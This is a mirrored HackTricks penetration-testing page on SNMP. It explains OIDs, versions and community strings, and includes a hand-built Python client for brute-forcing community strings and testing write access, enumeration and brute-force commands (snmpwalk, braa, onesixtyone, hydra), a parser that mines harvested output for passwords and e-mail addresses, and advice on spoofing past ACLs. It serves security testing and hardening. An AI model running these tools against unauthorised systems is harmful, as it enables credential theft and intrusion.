mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-12 21:28:55 +00:00
# 161,162,10161,10162/udp - Pentesting SNMP

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

If you are interested in a **hacking career** and want to hack the unhackable - **we are hiring!** (_fluent Polish written and spoken required_).

{% embed url="https://www.stmcyber.com/careers" %}

## Basic Information

**SNMP - Simple Network Management Protocol** is a protocol used to monitor and manage different devices in the network (like routers, switches, printers, IoT devices...). The managed device runs an SNMP **agent**; the monitoring station (the **manager**) queries it.

```
PORT    STATE SERVICE REASON       VERSION
161/udp open  snmp    udp-response ttl 244 ciscoSystems SNMPv3 server (public)
```

{% hint style="info" %}
SNMP also uses the port **162/UDP** for **traps**. These are data **packets sent from the SNMP agent (the managed device) to the manager without being explicitly requested**, typically to report an event such as a link going down or an authentication failure (a request with a wrong community string).
{% endhint %}

### MIB

To ensure that SNMP access works across manufacturers and with different client-server combinations, the **Management Information Base (MIB)** was created. MIB is an **independent format for storing device information**. A MIB is a **text** file in which all queryable **SNMP objects** of a device are listed in a **standardized** tree hierarchy. It contains at **least one `Object Identifier` (`OID`)**, which, in addition to the necessary **unique address** and a **name**, also provides information about the type, access rights, and a description of the respective object.\
MIB files are written in the `Abstract Syntax Notation One` (`ASN.1`) based ASCII text format. The **MIBs do not contain data**: they describe **where to find which piece of information** and what it looks like, i.e. which value a specific OID returns and which data type it uses. That is why a walk without the right MIBs loaded shows only numeric OIDs, while with them loaded the same walk shows names such as `SNMPv2-MIB::sysDescr.0`.

### OIDs

**Object Identifiers (OIDs)** play a crucial role. These unique identifiers are designed to manage objects within a **Management Information Base (MIB)**.

The highest levels of MIB object IDs, or OIDs, are allocated to diverse standard-setting organizations. It is within these top levels that the framework for global management practices and standards is established.

Furthermore, vendors are granted the liberty to establish private branches. Within these branches, they have the **autonomy to include managed objects pertinent to their own product lines**. This system ensures that there is a structured and organized method for identifying and managing a wide array of objects across different vendors and standards.

![](<../../.gitbook/assets/SNMP_OID_MIB_Tree (1).png>)

You can **navigate** through an **OID tree** from the web here: [http://www.oid-info.com/cgi-bin/display?tree=#focus](http://www.oid-info.com/cgi-bin/display?tree=#focus) or **see what an OID means** (like `1.3.6.1.2.1.1`) accessing [http://oid-info.com/get/1.3.6.1.2.1.1](http://oid-info.com/get/1.3.6.1.2.1.1).\
There are some **well-known OIDs** like the ones inside [1.3.6.1.2.1](http://oid-info.com/get/1.3.6.1.2.1), which is MIB-2, the set of standard Simple Network Management Protocol (SNMP) variables. From the **OIDs hanging from this one** you can obtain some interesting host data (system data, network data, process data...).

### **OID Example**

[**Example from here**](https://www.netadmintools.com/snmp-mib-and-oids/):

**`1 . 3 . 6 . 1 . 4 . 1 . 1452 . 1 . 2 . 5 . 1 . 3. 21 . 1 . 4 . 7`**

Here is a breakdown of this address.

* 1 – `iso`: the root arc assigned to ISO. Every OID used by SNMP starts with "1".
* 3 – `identified-organization` (often shown as `org`): organizations registered with ISO.
* 6 – `dod`: the US Department of Defense, the organization that originally established the Internet.
* 1 – `internet`: the subtree that holds everything managed over the Internet (the IETF/IANA space).
* 4 – `private`: objects defined by private organizations rather than by the standards themselves.
* 1 – `enterprises`: the branch in which every vendor (enterprise) receives its own number.

These first six values, `1.3.6.1.4.1`, are shared by **every vendor-specific OID**. Standard objects do not live here: MIB-2 objects such as `sysDescr` hang from `1.3.6.1.2.1` (`mgmt`) instead, so the prefix already tells you whether you need the vendor's MIB or a standard one.

Moving on to the next set of numbers.

* 1452 – the enterprise number assigned to the organization that manufactured this device (look it up in the IANA "Private Enterprise Numbers" registry).
* 1 – explains the type of device. In this case, it is an alarm clock.
* 2 – determines that this device is a remote terminal unit.

The rest of the values give specific information about the device. Everything after the enterprise number is defined by that vendor's private MIB, so these meanings hold only for this vendor:

* 5 – denotes a discrete alarm point.
* 1 – specific point in the device
* 3 – port
* 21 – address of the port
* 1 – display for the port
* 4 – point number
* 7 – state of the point

### SNMP Versions

There are 3 versions of SNMP worth knowing:

* **SNMPv1**: The original one and still very common. The **authentication is based on a string** (the community string) that travels in **plain text** (all the information travels in plain text).
* **SNMPv2c**: Same security model as v1 (a **community string** sent in **plain text**); it adds the `GetBulk` operation and 64-bit counters. Where this page says "version 2" it means 2c, the only v2 variant in real use.
* **SNMPv3**: Uses a proper **user-based security model** (USM): a username with optional **authentication** (HMAC-MD5/SHA) and optional **encryption** (DES/AES) of the payload, giving the levels `noAuthNoPriv`, `authNoPriv` and `authPriv`. A **dictionary attack** against the user's passphrases is still possible, but it is much harder than guessing a community string in v1/v2c. Note that a v3 agent with users configured at `noAuthNoPriv` is just as exposed as v1/v2c: knowing the username is enough.

### Community Strings

As mentioned before, **in order to access the information saved on the MIB you need to know the community string on versions 1 and 2/2c and the credentials on version 3.**\
There are **2 types of community strings**, and by default they are named after their role:

* **`public`**: mainly **read-only** functions
* **`private`**: **read/write** in general

Note that **the writability of an OID depends on the community string used**, so **even** if you find that "**public**" is being used, you could be able to **write some values.** Also, there **may** exist objects which are **always "Read Only"** (their MIB defines them as `read-only`), whatever string you use.\
If you try to **write** an object you are not allowed to, the agent answers with an error instead of staying silent: **`noSuchName`** in SNMPv1, and in SNMPv2c **`noAccess`** (the community has no write access to that object) or **`notWritable`** (the object itself is read-only). The distinction matters: the first two mean "try another string", the last means "try another object".

In versions 1 and 2/2c if you use a **bad** community string the agent won't **respond** at all (it silently drops the request, and may emit an `authenticationFailure` trap to its manager). So, if it responds, a **valid community string was used**. This is what makes brute-forcing the string feasible: one UDP packet per guess, and any answer is a hit.

## Ports

[From Wikipedia](https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol):

* The SNMP agent receives requests on UDP port **161**.
* The manager receives notifications ([Traps](https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol#Trap) and [InformRequests](https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol#InformRequest)) on port **162**.
* When used with [Transport Layer Security](https://en.wikipedia.org/wiki/Transport_Layer_Security) or [Datagram Transport Layer Security](https://en.wikipedia.org/wiki/Datagram_Transport_Layer_Security), requests are received on port **10161** and notifications are sent to port **10162**.

## Brute-Force Community String (v1 and v2c)

To **guess the community string** you could perform a dictionary attack. Check [here different ways to perform a brute-force attack against SNMP](../../generic-methodologies-and-resources/brute-force.md#snmp). Frequently used community strings are `public` and `private`, and vendor or site names are common too. Keep in mind what the previous section said: a wrong string gets no answer at all, so every miss costs a full timeout, and silence can mean a wrong string as much as a closed or filtered port. Tools such as `onesixtyone` and `hydra` (see the commands at the end of the page) simply send one request per string and report whatever replies.

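The client below is example code written for this page (it is neither the HackTricks project's code nor net-snmp's) and ties together three things the sections above describe: the BER encoding of an OID, as in the enterprise example `1.3.6.1.4.1.1452...`; the "silence means wrong string, any reply means a hit" rule that makes the community brute force work; and the error-status of a SetRequest, which is what tells a read-only string apart from a read-only object when you test writability. Everything is built by hand from the standard library. `host`, `port`, `wordlist` and `version` are whatever you pass in (`version=0` for v1, `1` for v2c); `sysContact.0` is used for the write test because writing its current value back changes nothing.

```python
# Minimal SNMPv1/v2c client built from raw BER, stdlib only (example code written for this page).
import os
import socket

SYS_DESCR, SYS_CONTACT = "1.3.6.1.2.1.1.1.0", "1.3.6.1.2.1.1.4.0"
ERROR_STATUS = {0: "writable", 2: "noSuchName", 6: "noAccess", 16: "authorizationError", 17: "notWritable"}

def _tlv(tag, body):
    n = len(body)
    if n < 0x80:  # short-form length
        return bytes([tag, n]) + body
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")  # long form: 0x8N then N length bytes
    return bytes([tag, 0x80 | len(lb)]) + lb + body

def ber_int(value):
    nbytes = (value.bit_length() + 8) // 8  # always leave room for the sign bit
    return _tlv(0x02, value.to_bytes(nbytes, "big", signed=True))

def ber_oid(oid):
    arcs =[int(a) for a in oid.strip(".").split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])  # first two arcs share one byte
    for arc in arcs[2:]:  # remaining arcs: base-128, high bit set on all but the last byte
        chunk = [arc & 0x7F]
        while arc > 0x7F:
            arc >>= 7
            chunk.append(0x80 | (arc & 0x7F))
        out.extend(reversed(chunk))
    return _tlv(0x06, bytes(out))

def build_message(pdu_tag, community, varbinds, request_id, version=1):
    """version 0 = SNMPv1, 1 = SNMPv2c; pdu_tag 0xA0 Get, 0xA1 GetNext, 0xA2 Response, 0xA3 Set."""
    vbl = b"".join(_tlv(0x30, ber_oid(oid) + val) for oid, val in varbinds)
    pdu = _tlv(pdu_tag, ber_int(request_id) + ber_int(0) + ber_int(0) + _tlv(0x30, vbl))
    return _tlv(0x30, ber_int(version) + _tlv(0x04, community.encode()) + pdu)

def _read_tlv(buf, pos):
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def decode_oid(body):
    arcs, val = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:  # last byte of this arc
            arcs, val = arcs + [val], 0
    return ".".join(map(str, arcs))

def parse_message(packet):  # decode a v1/v2c message (request or response) into a dict
    _, msg, _ = _read_tlv(packet, 0)
    _, ver, pos = _read_tlv(msg, 0)
    _, community, pos = _read_tlv(msg, pos)
    pdu_tag, pdu, _ = _read_tlv(msg, pos)
    ints, pos = [], 0
    for _ in range(3):  # request-id, error-status, error-index
        _, body, pos = _read_tlv(pdu, pos)
        ints.append(int.from_bytes(body, "big", signed=True))
    _, vbl, _ = _read_tlv(pdu, pos)
    varbinds, pos = [], 0
    while pos < len(vbl):
        _, vb, pos = _read_tlv(vbl, pos)
        _, oid, p = _read_tlv(vb, 0)
        vtag, vbody, _ = _read_tlv(vb, p)
        if vtag == 0x04:  # OCTET STRING
            value = vbody.decode(errors="replace")
        elif vtag in (0x02, 0x41, 0x42, 0x43):  # INTEGER, Counter32, Gauge32, TimeTicks
            value = int.from_bytes(vbody, "big", signed=(vtag == 0x02))
        else:  # NULL, OID, noSuchObject (0x80), endOfMibView (0x82) ...
            value = None
        varbinds.append((decode_oid(oid), value))
    return {"version": ver[-1], "community": community.decode(errors="replace"), "pdu_tag": pdu_tag,
            "request_id": ints[0], "error_status": ints[1], "varbinds": varbinds}

def exchange(host, packet, port=161, timeout=1.0):  # decoded reply, or None if the agent stays silent
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(packet, (host, port))
        try:
            return parse_message(s.recvfrom(65535)[0])
        except socket.timeout:
            return None

def brute_force(host, wordlist, version=1, **kw):
    """v1/v2c agents drop requests carrying a wrong community, so any reply at all is a hit."""
    rid = int.from_bytes(os.urandom(3), "big")
    pairs = ((c, exchange(host, build_message(0xA0, c, [(SYS_DESCR, _tlv(0x05, b""))], rid, version), **kw))
             for c in wordlist)
    return [(c, r["varbinds"][0][1]) for c, r in pairs if r is not None]

def check_writable(host, community, version=1, **kw):
    """Non-destructive write test: read sysContact.0, then SET it back to the very same value."""
    rid = int.from_bytes(os.urandom(3), "big")
    reply = exchange(host, build_message(0xA0, community, [(SYS_CONTACT, _tlv(0x05, b""))], rid, version), **kw)
    if reply is None or reply["error_status"]:
        return "no read access"
    current = _tlv(0x04, (reply["varbinds"][0][1] or "").encode())
    reply = exchange(host, build_message(0xA3, community, [(SYS_CONTACT, current)], rid + 1, version), **kw)
    return "no reply" if reply is None else ERROR_STATUS.get(reply["error_status"], "error %d" % reply["error_status"])
```

Try `brute_force("10.10.11.136", ["public", "private", "community"], version=1)` with a short list first: it sends one datagram per guess and only misses wait for the timeout. A hit on `public` says nothing about writes; that is what `check_writable(host, community)` answers, and its result is one of the error names from the Community Strings section. UDP replies can be lost, so a silent agent is evidence, not proof; re-run the best candidates with a longer `timeout`.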
## Enumerating SNMP

It is recommended to install the following to see what **each OID gathered** from the device means (without the MIBs you only get numeric OIDs):

```bash
apt-get install snmp-mibs-downloader
download-mibs
# Finally comment out the line saying "mibs :" in /etc/snmp/snmp.conf
sudo vi /etc/snmp/snmp.conf
```

If you know a valid community string, you can access the data using **SNMPWalk** or **SNMP-Check**:

```bash
snmpbulkwalk -c [COMM_STRING] -v [VERSION] [IP] . #Don't forget the final dot
snmpbulkwalk -c public -v2c 10.10.11.136 .

snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP]
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] 1.3.6.1.2.1.4.34.1.3 #Get IPv6, needed dec2hex
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] NET-SNMP-EXTEND-MIB::nsExtendObjects #get extended
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] .1 #Enum all

snmp-check [DIR_IP] -p [PORT] -c [COMM_STRING]

nmap --script "snmp* and not snmp-brute" <target>

braa <community string>@<IP>:.1.3.6.* #Bruteforce specific OID
```

Note that `snmpbulkwalk` only works with v2c and v3 (`GetBulk` does not exist in v1), which is also why it is much faster than `snmpwalk` on large trees. Without a valid string none of these tools gets an answer; they just time out.

Thanks to extended queries (download-mibs), it is possible to enumerate even more about the system with the following command:

```bash
snmpwalk -v X -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull
```

**SNMP** has a lot of information about the host and things that you may find interesting are: **Network interfaces** (IPv4 and **IPv6** addresses), usernames, uptime, server/OS version, and **running processes** (their command lines may contain passwords)...

### **Dangerous Settings**

The settings below are net-snmp `snmpd.conf` directives (the most common Linux agent). Each of them hands out more access than a monitoring station needs, and they are exactly what you hope to find when you read the file after landing on a host.

### Access Settings

Two main settings enable access to the **full OID tree**, which is a crucial component in network management:

1. **`rwuser <user> noauth`** grants the SNMPv3 user read/write access to the whole OID tree at security level `noAuthNoPriv`: knowing the username is enough, no passphrase is checked.
2. For more specific control, access can be granted using:
   * **`rwcommunity <string> [source] [OID|-V view]`** for **IPv4** clients, and
   * **`rwcommunity6 <string> [source] [OID|-V view]`** for **IPv6** clients.

Both take a **community string** and an optional **source** (an address or a network such as `10.0.0.0/8`). When the source and the view are omitted, the string grants full read/write access irrespective of where the request comes from, which is the configuration you will usually find. Their read-only counterparts are `rouser` and `rocommunity`/`rocommunity6`.

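Weak and hardened net-snmp `snmpd.conf` side by side, as an added illustration written for this page (not a configuration taken from the HackTricks project): the first fragment is what the directives above look like in a real file, the second is the same agent restricted to a view, a source network and authenticated SNMPv3 users. The community strings, the user `noc`, the passphrases and the `10.0.0.0/8` management network are placeholders.

```conf
# --- weak: what a pentester hopes to find ---
rocommunity  public                       # anyone who can reach 161/udp may read the whole tree
rwcommunity  private                      # ... and write it: no source restriction, no view
rwcommunity6 private                      # same for IPv6
rwuser       admin noauth                 # SNMPv3 user "admin", noAuthNoPriv, full read/write

# --- hardened: same agent, least privilege ---
agentAddress udp:161,udp6:[::1]:161       # listen only where needed
view systemonly included .1.3.6.1.2.1.1   # system group (sysDescr, sysContact, ...)
view systemonly included .1.3.6.1.2.1.25.1
rocommunity  R3ad0nly-Str1ng 10.0.0.0/8 -V systemonly   # read-only, one network, one view
# no rwcommunity at all: writes go through SNMPv3 only
createUser   noc SHA "long-auth-passphrase" AES "long-priv-passphrase"
rwuser       noc priv                     # authPriv required; USM rejects noAuthNoPriv requests
```

`createUser` is read from `/var/lib/snmp/snmpd.conf` (or written by `net-snmp-config --create-snmpv3-user`): on first start the daemon hashes the passphrases and rewrites the line as `usmUser`, so that file is worth pulling if you land on the box (see the configuration files section below). Compare the two halves against whatever you find on a target; every line from the first half is a finding in itself.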
### SNMP Parameters for Microsoft Windows

A series of **Management Information Base (MIB) values** are utilized to monitor various aspects of a Windows system through SNMP. Most of them come from the standard HOST-RESOURCES-MIB, so they also work on any other agent implementing it (net-snmp on Linux included); only the `1.3.6.1.4.1.77` branch (LanMgr-Mib-II) is Windows specific:

* **System Processes**: `1.3.6.1.2.1.25.1.6.0` (`hrSystemProcesses`) returns the number of processes currently loaded or running.
* **Running Programs**: `1.3.6.1.2.1.25.4.2.1.2` (`hrSWRunName`) lists the names of running programs, one entry per process.
* **Processes Path**: `1.3.6.1.2.1.25.4.2.1.4` (`hrSWRunPath`) tells where each process is running from; `1.3.6.1.2.1.25.4.2.1.5` (`hrSWRunParameters`) next to it holds the command-line arguments, which is where passwords tend to show up.
* **Storage Units**: `1.3.6.1.2.1.25.2.3.1.4` (`hrStorageAllocationUnits`) is one column of the storage table; walk `1.3.6.1.2.1.25.2.3` to get descriptions, sizes and usage as well.
* **Software Name**: `1.3.6.1.2.1.25.6.3.1.2` (`hrSWInstalledName`) identifies the software installed on the system.
* **User Accounts**: `1.3.6.1.4.1.77.1.2.25` (`svUserTable`, Windows only) lists the local user accounts.
* **TCP Local Ports**: `1.3.6.1.2.1.6.13.1.3` (`tcpConnLocalPort`) lists TCP local ports, providing insight into active connections and listeners.

### Cisco

Take a look at this page if you have Cisco equipment:

{% content-ref url="cisco-snmp.md" %}
[cisco-snmp.md](cisco-snmp.md)
{% endcontent-ref %}

## From SNMP to RCE

If you have the **string** that allows you to **write values** inside the SNMP service, you may be able to abuse it to **execute commands**:

{% content-ref url="snmp-rce.md" %}
[snmp-rce.md](snmp-rce.md)
{% endcontent-ref %}

## **Massive SNMP**

[Braa](https://github.com/mteg/braa) is a mass SNMP scanner. The intended usage of such a tool is, of course, making SNMP queries, but unlike snmpwalk from net-snmp, it is able to query dozens or hundreds of hosts simultaneously, and in a single process. Thus, it consumes very few system resources and does the scanning VERY fast.

Braa implements its OWN SNMP stack, so it does NOT need any SNMP libraries like net-snmp.

**Syntax:** braa \[Community-string]@\[IP of SNMP server]:\[iso id]

```bash
braa ignite123@192.168.1.125:.1.3.6.*
```

This can extract many MB of information that you cannot process manually.

So, let's look for the most interesting information (from [https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/](https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/)), assuming each host's output was saved to a `*.snmp` file:

### **Devices**

The process begins with the extraction of the **sysDescr MIB data** (1.3.6.1.2.1.1.1.0) from each file to identify the devices. This is accomplished through the use of a **grep command**:

```bash
grep ".1.3.6.1.2.1.1.1.0" *.snmp
```

### **Identify Private String**

A crucial step involves identifying the **private community string** used by organizations, particularly on Cisco IOS routers. This string enables the extraction of **running configurations** from routers. The identification often relies on analyzing SNMP Trap data for the word "trap" with a **grep command** (a trap destination is configured together with the community the traps are sent with, so the string leaks alongside it):

```bash
grep -i "trap" *.snmp
```

### **Usernames/Passwords**

Logs stored within MIB tables are examined for **failed logon attempts**, which might accidentally include passwords entered as usernames. Keywords such as _fail_, _failed_, or _login_ are searched to find valuable data:

```bash
grep -i "login\|fail" *.snmp
```

### **Emails**

Finally, to extract **email addresses** from the data, a **grep command** with a regular expression is used, focusing on patterns that match email formats:

```bash
grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" *.snmp
```

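The four grep steps above as one parser, written for this page as example code (it is not from the Rapid7 post nor from HackTricks): it reads the saved output, keys everything by host, and reports devices, trap/community hints, login-failure lines and e-mail addresses in a single pass, so a hit is attributed to the device it came from instead of to a file name. The two line formats it accepts are assumptions about the tools' output, braa's `host:<ms>ms:<oid>:<value>` and snmpwalk's `<oid> = <TYPE>: <value>`; the sample lines at the top are constructed for the example, not real captures, and the `1.3.6.1.4.1.99999` OIDs in them are made-up vendor objects.

```python
# Triage of saved braa/snmpwalk output; example code written for this page, not from the Rapid7 post.
import re

# Line formats handled (assumptions about the tools' output, see the lead-in):
#   braa:      host:<ms>ms:<oid>:<value>
#   snmpwalk:  <oid or MIB name> = <TYPE>: <value>
BRAA = re.compile(r"^(?P<host>[^:\s]+):\d+ms:(?P<oid>\.?[\d.]+):(?P<value>.*)$")
WALK = re.compile(r"^(?P<oid>\S+) = (?:[A-Za-z0-9-]+: )?(?P<value>.*)$")
EMAIL = re.compile(r"\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b")  # same regex as the grep above
SYS_DESCR = "1.3.6.1.2.1.1.1.0"

# Constructed sample, not a real capture: two braa hosts plus one snmpwalk line; 99999 is a made-up enterprise.
SAMPLE = """\
192.168.1.125:41ms:.1.3.6.1.2.1.1.1.0:Cisco IOS Software, C2960 Software
192.168.1.125:44ms:.1.3.6.1.2.1.1.4.0:netops@example.com
192.168.1.125:52ms:.1.3.6.1.4.1.99999.1.7.0:snmp-server host 192.168.1.10 trap n0cTr4p
192.168.1.130:39ms:.1.3.6.1.2.1.1.1.0:Linux fileserver 5.15.0-91-generic
192.168.1.130:60ms:.1.3.6.1.4.1.99999.2.1.0:Failed login for user bob from 10.0.0.7
iso.3.6.1.2.1.1.1.0 = STRING: "Hardware: Intel64 Family 6 - Software: Windows Version 6.3"
"""

def parse_line(line):
    """Return (host, oid, value) or None; snmpwalk output carries no host, so it is keyed '-'."""
    m = BRAA.match(line) or WALK.match(line)
    if not m:
        return None
    host = m.groupdict().get("host") or "-"
    oid = m.group("oid").lstrip(".").replace("iso.", "1.", 1)
    return host, oid, m.group("value").strip().strip('"')

def harvest(lines):
    """One pass over all lines; returns what the four grep steps look for, grouped per host."""
    out = {"devices": {}, "trap_hints": [], "login_hints": [], "emails": set()}
    for line in lines:
        parsed = parse_line(line)
        if not parsed:
            continue
        host, oid, value = parsed
        if oid == SYS_DESCR or oid.endswith("sysDescr.0"):
            out["devices"][host] = value
        if re.search(r"trap|community", value, re.I):  # trap destinations carry the community they use
            out["trap_hints"].append((host, oid, value))
        if re.search(r"login|fail", value, re.I):  # log tables: passwords typed into the username field
            out["login_hints"].append((host, oid, value))
        out["emails"].update(EMAIL.findall(value))
    return out

def report(lines):
    """Human-readable summary: devices first, then the hints worth a manual look."""
    h = harvest(lines)
    rows = ["%s: %s" % (host, descr) for host, descr in sorted(h["devices"].items())]
    rows += ["[trap] %s %s: %s" % t for t in h["trap_hints"]]
    rows += ["[login] %s %s: %s" % t for t in h["login_hints"]]
    rows += ["[email] " + e for e in sorted(h["emails"])]
    return "\n".join(rows)

if __name__ == "__main__":
    import sys
    # usage: python snmp_harvest.py *.snmp   (no arguments: run on the constructed sample)
    src = [l for f in sys.argv[1:] for l in open(f, errors="replace")] if len(sys.argv) > 1 else SAMPLE.splitlines()
    print(report(src))
```

Run it over the `*.snmp` files produced by braa or snmpwalk; the `trap_hints` entries are the ones to try as write communities against the same host, and anything under `login_hints` deserves a manual read because the "username" that failed is often a password.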
## Modifying SNMP values

You can use _**NetScanTools**_ or net-snmp's `snmpset` to **modify values**. You will need to know the **private string** (a read/write community) in order to do so, and the target object must itself be writable in the MIB (see the error codes in the Community Strings section).

## Spoofing

If there is an ACL that only allows some IPs to query the SNMP service, you can spoof one of these addresses as the source of the UDP packet: SNMP runs over UDP, so there is no handshake to complete and the agent processes the request as if it came from the allowed host. The reply is sent to the spoofed address, not to you, so you either need to sniff the traffic on the path (or on the spoofed host's segment), or send requests whose effect you can observe some other way, like a **SetRequest**, which does not need its reply to have worked.

## Examine SNMP Configuration files

* snmp.conf
* snmpd.conf
* snmp-config.xml

On net-snmp hosts the usual locations are `/etc/snmp/snmpd.conf` (community strings, `rwuser`/`rocommunity` lines, `extend` commands) and `/var/lib/snmp/snmpd.conf`, where the daemon persists SNMPv3 users (`usmUser` lines, generated from `createUser`); client-side defaults, sometimes including a community string, live in `/etc/snmp/snmp.conf` and `~/.snmp/snmp.conf`.

## HackTricks Automatic Commands

```
Protocol_Name: SNMP #Protocol Abbreviation if there is one.
Port_Number: 161 #Comma separated if there is more than one.
Protocol_Description: Simple Network Management Protocol #Protocol Abbreviation Spelled out

Entry_1:
  Name: Notes
  Description: Notes for SNMP
  Note: |
    SNMP - Simple Network Management Protocol is a protocol used to monitor different devices in the network (like routers, switches, printers, IoTs...).

    https://book.hacktricks.xyz/pentesting/pentesting-snmp

Entry_2:
  Name: SNMP Check
  Description: Enumerate SNMP
  Command: snmp-check {IP}

Entry_3:
  Name: OneSixtyOne
  Description: Crack SNMP passwords
  Command: onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt {IP} -w 100

Entry_4:
  Name: Nmap
  Description: Nmap snmp (no brute)
  Command: nmap --script "snmp* and not snmp-brute" {IP}

Entry_5:
  Name: Hydra Brute Force
  Description: Need Nothing
  Command: hydra -P {Big_Passwordlist} -v {IP} snmp
```
